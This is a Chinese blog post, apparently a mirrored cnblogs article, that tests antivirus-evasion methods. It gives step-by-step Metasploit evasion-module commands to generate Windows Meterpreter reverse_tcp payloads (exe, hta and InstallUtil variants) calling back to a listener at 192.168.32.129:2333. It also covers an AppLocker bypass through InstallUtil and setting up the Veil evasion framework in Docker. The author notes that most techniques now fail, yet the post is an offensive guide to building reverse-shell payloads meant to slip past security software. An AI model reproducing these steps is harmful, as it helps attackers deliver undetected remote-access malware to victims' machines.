zoukankan      html  css  js  c++  java
  • 一些免杀方法测试

    时至今日,我所了解的很多免杀的手段都已经失效了,最近又测试了一些免杀方法(感谢各位大佬的无私奉献,泪目),列举了一些过去相对来说还算可用的办法供参考(绝大多数都过不了的就算了不列举了,这个“绝大多数”是个相对概念,有的能过有的不能)

    随着安防产品越来越多、功能越来越强大,在某种意义上来说,防御是作为一种知识的累积,如果攻击手段没有更新的突破而完全靠吃老本是混不下去的

    我也相信一定是有能全免杀的方法的,只是我不知道也没研究出个所以然而已(太菜了)

    但也没必要沮丧,针对不同的杀软选择不同的免杀策略还是可以混一混的,有的方法过不了这个或许可以过另一个

    本文仅做网上过去常说的一些“免杀”方法的展示,而非对目前绝对免杀方法的介绍

    实际上可用的免杀必须是静态、行为都免杀,现在免杀几个月之后可能就不免杀了(国内软件主要针对的是某数字和某绒,本文中的“过不了”主要是指过不了这两款杀软,并不是说所有杀软都过不了)

     当前杀软查杀的几个原理:

    (1)特征码:杀软会抽取相关文件的部分特征代码进行识别,有文件特征码和内存特征码

    (2)行为检测:针对敏感操作进行监视,有异常说明有病毒行为

    (3)文件校验和:会记录正常文件的校验和,有异常说明感染病毒

    (4)云查杀:“云”,懂得都懂,海量的特征数据规则,干死你

    (5)机器学习:内容行为+算法

     ......

    与之对应的免杀思路大致有:改特征码(关键是如何定位)、加花指令(垃圾数据影响特征码偏移)、加壳(先运行壳再由壳把加密程序还原到内存再运行程序)、多重编译(用编辑器多次编码)、分离免杀(shellcode与加载器分离)、修改资源(绕白名单进行某些资源伪造)......

     既然敢放到VT上,就不怕,以测试和回顾为主,这些方法都不是新东西,对于免杀效果也不能做过高期望,只要爆出来,99%会失效(尝试过非常多的办法,无一例外联网GG了)

    关于针对不同杀软的各种工具实在太太太多了(整理不完了),本文原打算列举一些方法,测试效果发现不大理想(写不下去了),这篇文章就不删除了

    后续文章可能会改变思路,针对某款杀毒软件写特定专题从工具代码结合的角度来整理,不然太乱脑壳痛

    1.msf  evasion模块

    一端监听,另一端执行回连的套路

    (1)生成exe

    依次执行

    use windows/windows_defender_exe

    set filename payload.exe

    set payload windows/meterpreter/reverse_tcp

    set LHOST 192.168.32.129

    set LPORT 2333

    run

     把这个路径下的payload.exe mv到你能找到的路径下

    啊,呵呵,不怎么样,能报毒的过半了

     

    (2)生成hta

    use windows/windows_defender_js_hta

    好一些了

     

     (3)生成install_util

    use windows/applocker_evasion_install_util

    set filename payload.txt

    set payload windows/meterpreter/reverse_tcp

    set LHOST 192.168.32.129

    set LPORT 2333

    run

    生成txt文件需要用csc.exe进行编译生成payload.exe文件,还要用InstallUtil.exe /logfile= /LogToConsole=false /U payload.exe来加载执行

    以上三种过去还行,但截止至今日,看似还行实则GG,测试发现过不了行为这一关

    还有一些与代码结合的方法等到后面代码部分再说

    msf剩下的方法无论是用shitaka_ga_nai多次编码,还是捆绑到另一个软件上执行,还是多种方法组合,然并卵, 效果都一般般,不能说没有用,只能说差强人意

    2.veil

    veil、venom、shellter免杀工具三剑客(安装都很复杂)

    这是一个老牌的工具了,时至今日,尚能饭否?

    测试一下

    安装这东西属实恶心,网上有人说

    apt -y install veil

    /usr/share/veil/config/setup.sh --force --silent

    啊,你可以试试,反正我是各种依赖问题,最后也没成(有人说安装复杂,我不信,然后就踩坑了)

    算了,用docker(在kali上安装docker竟然也出问题,最后换成浙大的zju解决了

    vim /etc/apt/sources.list  加上浙大源

    deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free

    deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free

    之后执行

    curl -fsSL http://mirrors.zju.edu.cn/docker-ce/linux/debian/gpg | sudo apt-key add -  

    echo 'deb http://mirrors.zju.edu.cn/docker-ce/linux/debian/ buster stable' | sudo tee /etc/apt/sources.list.d/docker.list  

    sudo apt-get update  

    sudo apt-get install docker-ce

    docker安装成功

    以下案例是在我机器中成功的,网上也有一些其他的办法,你也可以尝试,总有适合自己环境的

    之后

    systemctl daemon-reload

    systemctl restart docker

    service docker restart

    docker pull mattiasohlsson/veil

    docker run -it -v /tmp/veil-output:/var/lib/veil/output:Z mattiasohlsson/veil                  (将宿主机的/tmp/veil-output映射到docker里,可使veil在宿主机kali中直接使用)

     

     然后关了可以这么进入(别忘了映射!最好还是按照上面的命令进入不要这么来)

     两种工具推荐使用第一个Evasion(做文件免杀的)

    在Veil>:中输入

    use 1

    list

    可见很多payloads

     

     推荐使用go或者ruby的payload,  Python、c等基于一些众人皆知的原因比较容易被干

     选用了go的16号payload

     

    看情况写吧

     

    完成

     

    由于做过映射,在宿主机kali中相应目录可以找到生成的exe文件

     

    之后故技重施,在msf中启动监听

     看看就好,我这里没过本地杀软静态,实际上测试效果也不理想

     

    3.Venom

    也是一个老工具了

    安装也是极其复杂,需要的东西太多,体验极差

    我是死活安不上wine32所以作罢了

    感兴趣可以看这篇文章  https://blog.csdn.net/qq_38228830/article/details/86182770

    4.Shellter

    三剑客最后一个,是一款开源的免杀工具

    同样需要wine32

    感兴趣可以看这篇文章 https://www.cnblogs.com/hkleak/p/12912706.html

    5.backdoor-factory

    BDF也是一个老工具了,kali自带但确实有问题,自己下吧

    思路是把shellcode插入正常文件代码中,也就是说需要一个被捆绑的宿主

     感兴趣推荐这篇文章 https://www.cnblogs.com/-qing-/p/11421709.html

    未完停更,禁止转载

  • 相关阅读:
    Equal Cut
    【线段树】Interval GCD
    zookeeper错误
    HBase之过滤器
    Hbase之缓存扫描加快读取速度
    Hbase之遍历超时处理
    Hbase之遍历获取数据
    Hbase之使用回调函数进行批处理操作
    Hbase之进行批处理操作
    Hbase之原子性更新数据
  • 原文地址:https://www.cnblogs.com/lcxblogs/p/14029301.html
Copyright © 2011-2022 走看看